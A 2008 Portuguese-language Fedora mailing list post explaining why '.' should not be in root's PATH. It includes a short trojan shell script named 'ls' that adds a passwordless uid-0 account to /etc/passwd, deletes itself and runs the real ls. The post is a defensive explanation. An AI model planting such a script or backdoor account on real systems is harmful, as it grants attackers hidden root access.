[Fedora-users-br] Coisas malucas do Linux

Gustavo Picoloto picoloto em gmail.com
Sáb Fev 9 15:42:48 UTC 2008

Sim, o padrão é não ter o diretório atual no path por segurança.

Pense na situação, você é root e eu sou usuário comum, seu path tem o
diretório atual, então eu crio um diretório com nome digamos "xxx" na
minha conta, encho de lixo (concateno diversos arquivos, para lotar o
hd e você perceber que tem um diretório "xxx" na minha conta ocupando
muito espaço). Dentro deste diretório também coloco um shell script
com o nome "ls" (lembre-se, você tem o "." no path e você é root).
Digamos que o script seja algo mais ou menos como:

---
#!/bin/bash

echo "fulano::0:0::/root:/bin/bash" >> /etc/passwd
rm "./ls"
/bin/ls
---

Pronto, quando você executar "ls", irá executar meu script, que irá
adicionar uma entrada para um novo usuário no passwd, essa conta terá
uid 0, outro root, o script se deletará e então irá executar o ls
verdadeiro, para você ver o que tem no diretório.

Tá, é tosco, mas é só para exemplificar o que poderia acontecer se
usar o "." no path.

Uma boa medida de segurança é não usar "." no path.

[]´s

Gustavo Picoloto